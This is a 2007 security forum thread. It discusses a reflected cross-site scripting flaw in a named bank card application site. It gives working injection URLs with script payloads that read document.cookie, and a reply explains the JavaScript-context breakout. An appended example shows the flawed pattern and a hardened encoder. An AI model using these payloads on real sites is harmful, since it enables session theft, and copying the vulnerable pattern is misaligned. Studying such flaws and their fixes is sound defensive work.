Sla.ckers.org
can be bug?
Posted by: Fugitif
Date: November 04, 2007 02:52PM

OK, try in Firefox:

https://wwwn.applyonlinenow.com/USCCapp/Ctl/entry?sc=FABDFB&mc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


I find this error:


Quote

"); cmTriggered = false; function triggerAppStart() { if (!cmTriggered) { cmTriggered = true; cmCreateApplicationTags("Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "CRD APP - ao", "150", "Your Information - Clicked", false, false, "", false, "CARD:AOLN:USCC:ao", true, false, false, null, "8AMC FABDFB", "119420943891120", null, null, null, null, null, null, null, "BANK OF AMERICA WORLD MASTERCARDREG WITH WORLDPOINTS WORLDCARD MASTERCARD", "CREDITCARD", false); cmCreateConversionEventTag("App View to Start", "2", "Card - AOLN", "0", "Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "8AMC FABDFB", "CRD APP - ao", null); cmCreateConversionEventTag("App Start to Submit", "1", "Card - AOLN", "0", "Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "8AMC FABDFB", "CRD APP - ao", null); } } //-->


wtf is??



Edited 2 time(s). Last edit at 11/04/2007 02:52PM by Fugitif.

Re: can be bug?
Posted by: DanielG
Date: November 05, 2007 02:36PM

You are injecting into the JavaScript on the site; the 'bug' is that you supply the "</script>", which ends the script block and displays the rest of it as text.

If you look at line 182 in the source code you see

cmCreateProductDetailsTag("Application: CRD APP..bla...", "sourcecode:FABDFB", ""><script>alert(document.cookie)</script>");

The mc variable is blindly put into the JavaScript part of the page.

try hxxps://wwwn.applyonlinenow.com/USCCapp/Ctl/entry?sc=FABDFB&mc=%22);%20alert(%22mc

to get an alert with the text 'mc'.

Nice find for a site with "Bank of America World MasterCard®".

--
Yeah i'm Dutch, sweeeeeeeeeeet.

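The behaviour explained in the reply above, as an added example that is not part of the original thread and not the site's code: a parameter pasted into a JavaScript string inside a script block, next to an encoder for that context. All function names, the template text and the sample value handling are assumptions made for illustration.

```javascript
// Added example (not the site's code); every name here is hypothetical.
// Vulnerable pattern from the thread: the parameter is pasted straight into a
// double-quoted JavaScript string inside a <script> block.
function renderVulnerable(mc) {
  return '<script>cmCreateProductDetailsTag("app", "src", "' + mc + '");</script>';
}

// Encode a value as a JS string literal for use inside an HTML <script> block.
// JSON.stringify escapes quotes, backslashes and control characters; the second
// pass rewrites <, > and & so the HTML parser never sees "</script" in the data.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(mc) {
  return '<script>cmCreateProductDetailsTag("app", "src", ' + jsStringLiteral(mc) + ');</script>';
}

// Stand-in for the HTML parser rule: a script block ends at the first
// "</script", whether or not the JS tokenizer is inside a string at that point.
function firstScriptBody(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.toLowerCase().indexOf('</script', start);
  return html.slice(start, end);
}

// Run the script body with stub functions and report what the tag call
// received, which other calls the input managed to add, and any parse error.
function runScriptBody(html) {
  const result = { tagArg: undefined, injectedCalls: [] };
  try {
    new Function('cmCreateProductDetailsTag', 'alert', firstScriptBody(html))(
      (a, b, c) => { result.tagArg = c; },
      (msg) => { result.injectedCalls.push(msg); });
  } catch (e) {
    result.error = e.name; // e.g. SyntaxError when the block was cut short
  }
  return result;
}

// The two mc values from the thread, URL-decoded.
const SAMPLES = ['"><script>alert(document.cookie)</script>', '"); alert("mc'];
for (const mc of SAMPLES) {
  console.log(runScriptBody(renderVulnerable(mc)), runScriptBody(renderHardened(mc)));
}
```

With the hardened renderer both values arrive at the tag function unchanged as data; with the vulnerable one the first value truncates the block into a syntax error and the second adds a call of its own.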
Re: can be bug?
Date: December 17, 2007 08:25PM

cool.... though I don't know what you just did there -_-


